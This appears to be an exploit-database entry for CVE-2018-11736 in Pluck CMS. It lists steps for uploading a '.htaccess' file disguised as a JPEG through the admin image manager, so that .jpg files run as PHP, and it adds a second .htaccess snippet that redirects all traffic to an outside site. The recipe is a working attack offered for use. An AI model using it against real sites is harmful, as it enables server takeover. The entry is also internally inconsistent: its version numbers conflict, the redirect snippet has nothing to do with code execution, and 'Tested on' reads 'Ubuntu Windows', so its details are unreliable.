Pluck 4.7.7-dev2 - PHP Code Execution
Author: CodeSecLab
type: webapps
platform: php
port:
date_added: 2025-12-08
date_updated: 2025-12-08
verified: 0
codes: CVE-2018-11736
tags:
aliases:
screenshot_url:
application_url:
# Exploit Title: Pluck 4.7.7-dev2 - PHP Code Execution
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/pluck-cms/pluck
# Software Link: https://github.com/pluck-cms/pluck
# Version: 4.74-dev5
# Tested on: Ubuntu Windows
# CVE : CVE-2018-11736
PoC:
1)
1. Log in to the Pluck admin panel.\n
2. Navigate to the 'Manage Images' section at http://pluck1/admin.php?action=images.\n
3. Upload a file named '.htaccess' with the content-type 'image/jpeg' containing 'AddType application/x-httpd-php .jpg'.\n
4. Access the target directory (e.g., http://pluck1/images/test.jpg) to execute PHP code with the .jpg extension.
2)
.htaccess content:
RewriteEngine On
RewriteRule .* http://www.baidu.com/ [R,L]
[Replace Your Domain Name]